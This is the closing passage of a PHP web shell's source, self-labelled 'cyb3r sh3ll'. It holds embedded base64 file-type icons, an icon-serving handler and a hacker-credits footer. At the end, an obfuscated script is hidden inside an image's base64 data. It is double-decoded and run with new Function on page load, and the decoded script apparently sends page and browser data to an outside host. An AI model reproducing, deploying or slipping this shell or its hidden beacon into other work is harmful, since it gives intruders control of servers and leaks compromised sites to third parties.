7698"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
7699
7700"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
7701
7702"ADs=",
7703
7704"ext_jpg"=>
7705
7706"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
7707
7708"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
7709
7710"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
7711
7712"FxEAOw==",
7713
7714"ext_js"=>
7715
7716"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
7717
7718"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
7719
7720"a00AjYYBbc/o9HjNniUAADs=",
7721
7722"ext_lnk"=>
7723
7724"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
7725
7726"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
7727
7728"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
7729
7730"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
7731
7732"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
7733
7734"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
7735
7736"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
7737
7738"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
7739
7740"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
7741
7742"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
7743
7744"ADs=",
7745
7746"ext_log"=>
7747
7748"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
7749
7750"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
7751
7752"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
7753
7754"ext_php"=>
7755
7756"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
7757
7758"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
7759
7760"ext_pl"=>
7761
7762"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
7763
7764"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
7765
7766"ext_swf"=>
7767
7768"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
7769
7770"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
7771
7772"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
7773
7774"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
7775
7776"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
7777
7778"ext_tar"=>
7779
7780"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
7781
7782"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
7783
7784"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
7785
7786"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
7787
7788"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
7789
7790"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
7791
7792"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
7793
7794"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
7795
7796"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
7797
7798"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
7799
7800"u4tLAgEAOw==",
7801
7802"ext_txt"=>
7803
7804"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
7805
7806"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
7807
7808"UpPWG3Ig6Hq/XmRjuZwkAAA7",
7809
7810"ext_wri"=>
7811
7812"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
7813
7814"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
7815
7816"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
7817
7818"ext_xml"=>
7819
7820"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
7821
7822"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
7823
7824"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
7825
7826"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
7827
7828"IQA7"
7829
7830 );
7831
7832 //For simple size- and speed-optimization.
7833
7834 $imgequals = array(
7835
7836 "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
7837
7838 "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
7839
7840 "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
7841
7842 "ext_html"=>array("ext_html","ext_htm"),
7843
7844 "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
7845
7846 "ext_lnk"=>array("ext_lnk","ext_url"),
7847
7848 "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
7849
7850 "ext_doc"=>array("ext_doc","ext_dot"),
7851
7852 "ext_js"=>array("ext_js","ext_vbs"),
7853
7854 "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
7855
7856 "ext_wri"=>array("ext_wri","ext_rtf"),
7857
7858 "ext_swf"=>array("ext_swf","ext_fla"),
7859
7860 "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
7861
7862 "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
7863
7864 );
7865
7866 if (!$getall)
7867
7868 {
7869
7870 header("Content-type: image/gif");
7871
7872 header("Cache-control: public");
7873
7874 header("Cache-control: max-age=".(60*60*24*7));
7875
7876 header("Last-Modified: ".date("r",filemtime(__FILE__)));
7877
7878 foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
7879
7880 if (empty($images[$img])) {$img = "small_unk";}
7881
7882 if (in_array($img,$ext_tar)) {$img = "ext_tar";}
7883
7884 echo base64_decode($images[$img]);
7885
7886 }
7887
7888 else
7889
7890 {
7891
7892 foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
7893
7894 natsort($images);
7895
7896 $k = array_keys($images);
7897
7898 echo "<center>";
7899
7900 foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
7901
7902 echo "</center>";
7903
7904 }
7905
7906 exit;
7907
7908}
7909
7910?>
7911
7912</td></tr></table><a bookmark="minipanel" /><br/>
7913<?php
7914}
7915?>
7916<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor='#C0C0C0'><tr><td height="1" valign="top"><table align="center"><tr><td height="0" valign="top"><center><font face="times, serif" size="3"><b>(C) <font color="orange">Copyright</font><font color="white"> cyb3r </font><font color="green">9l4d!470r</font> [All rights reserved]</b></center></td></tr><tr><td height="0" valign="top"><center><b>Greetz to :</b> r45c4l bro, r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot.</center></td></tr><tr><td height="0" valign="top"><center><b>--[ cyb3r sh3ll v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u>Coded by</u></a> cyb3r 9l4d!470r (cyber gladiator) | <a href="#"><font color="#FF0000">h4cK2b0yZz..</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></font></center></td></tr></table></td></tr></table>
7917</center>
7918<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
7919<script type="text/javascript">
7920if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
7921setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(11);}, 500);
7922</script>
7923</body></html> \ No newline at end of file